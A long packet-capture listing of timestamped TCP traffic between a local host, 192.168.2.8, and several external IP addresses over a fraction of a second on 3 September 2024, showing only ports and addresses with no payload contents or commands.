Sep 3, 2024 17:13:20.127904892 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.127918959 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.127924919 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.127953053 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.128097057 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.128110886 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.128124952 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.128139973 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.128154039 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.128159046 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.128168106 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.128182888 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.128185034 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.128190994 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.128221035 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.128245115 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.128413916 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.128427982 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.128443956 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.128457069 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.128470898 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.128473043 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.128495932 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.128499031 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.128514051 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.128515005 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.128550053 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.128561974 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.128685951 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.128699064 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.128715038 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.128727913 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.128729105 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.128743887 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.128746033 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.128763914 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.128786087 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.128818989 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.128957987 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.128977060 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.128993034 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.129005909 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.129012108 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.129019976 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.129035950 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.129041910 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.129050016 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.129059076 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.129065990 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.129079103 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.129092932 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.129097939 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.129112005 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.129113913 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.129127979 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.129133940 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.129143000 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.129160881 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.129182100 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.129446983 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.129460096 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.129506111 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.129677057 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.129698992 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.129714012 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.129746914 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.129767895 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.129801035 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.129815102 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.129858971 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.129890919 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.129937887 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.130104065 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.130115986 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.130131006 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.130146027 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.130156040 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.130160093 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.130177021 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.130187035 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.130192041 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.130199909 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.130234003 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.130239964 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.130254030 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.130273104 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.130291939 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.130306959 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.130316019 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.130321980 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.130336046 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.130338907 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.130361080 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.130386114 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.130482912 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.130496025 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.130547047 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.130558968 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.130573988 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.130609035 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.130696058 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.130709887 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.130723000 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.130740881 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.130775928 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.130788088 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.130834103 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.130837917 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.130985975 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.130997896 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.131009102 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.131020069 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.131030083 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.131033897 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.131041050 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.131053925 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.131062984 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.131066084 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.131078005 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.131083965 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.131091118 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.131102085 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.131105900 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.131127119 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.131153107 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.131380081 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.131392002 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.131432056 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.131520987 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.131532907 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.131542921 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.131548882 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.131565094 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.131565094 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.131577969 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.131588936 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.131594896 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.131602049 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.131613970 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.131627083 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.131642103 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.131669998 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.149471045 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:20.150219917 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:20.155397892 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:20.159778118 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.159818888 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.159830093 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.159837961 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.159873962 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.159936905 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.159948111 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.159960032 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.159970999 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.159991980 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.160036087 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.160129070 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.160140038 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.160151005 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.160185099 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.160211086 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.160211086 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.160224915 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.160267115 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.160267115 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.160293102 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.160305977 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.160356045 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.160772085 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.160783052 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.160793066 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.160835981 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.161142111 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.161153078 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.161163092 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.161175013 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.161211967 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.161248922 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.161305904 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.161323071 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.161333084 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.161344051 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.161355019 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.161393881 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.161406040 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.161417007 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.161429882 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.161439896 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.161451101 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.161463022 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.161474943 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.161487103 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.161488056 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.161488056 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.161520958 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.161539078 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.161617994 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.161629915 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.161643028 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.161653042 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.161700964 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.161700964 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.161772013 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.161782980 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.161793947 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.161804914 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.161815882 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.161825895 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.161835909 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.161837101 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.161849022 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.161849022 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.161856890 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.161859989 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.161873102 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.161883116 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.161885977 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.161897898 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.161933899 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.161933899 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.162233114 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.162245035 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.162256002 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.162266970 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.162271976 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.162276983 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.162282944 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.162334919 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.162345886 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.162353992 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.162358999 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.162372112 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.162383080 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.162395000 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.162395954 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.162395000 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.162406921 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.162420034 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.162436008 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.162461042 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.162976027 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.162986994 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.162997007 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.163007975 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.163018942 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.163029909 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.163038015 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.163042068 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.163050890 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.163054943 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.163064003 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.163072109 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.163084030 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.163094997 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.163126945 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.163126945 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.163146973 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.163440943 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.163646936 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.163659096 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.163667917 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.163678885 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.163691044 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.163697958 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.163703918 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.163718939 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.163729906 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.163732052 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.163742065 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.163753986 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.163760900 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.163764954 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.163770914 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.163777113 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.163779974 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.163783073 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.163789988 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.163795948 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.163800955 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.163801908 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.163862944 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.164011955 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.164081097 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.164208889 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.164221048 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.164236069 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.164247990 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.164258003 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.164261103 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.164271116 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.164280891 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.164297104 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.164299011 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.164299965 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.164309025 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.164319992 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.164330006 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.164331913 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.164345980 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.164356947 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.164369106 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.164369106 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.164369106 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.164381981 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.164393902 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.164406061 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.164417028 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.164431095 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.164432049 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.164447069 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.164449930 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.164449930 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.164484978 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.164505959 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.228169918 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:20.229670048 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.229724884 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.229825974 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.229836941 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.229846954 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.229860067 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.229872942 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.229885101 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.229887962 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.229935884 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.229965925 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.230005026 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.230007887 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.230022907 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.230031967 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.230056047 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.230081081 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.230249882 CEST	80	49726	185.215.113.17	192.168.2.8
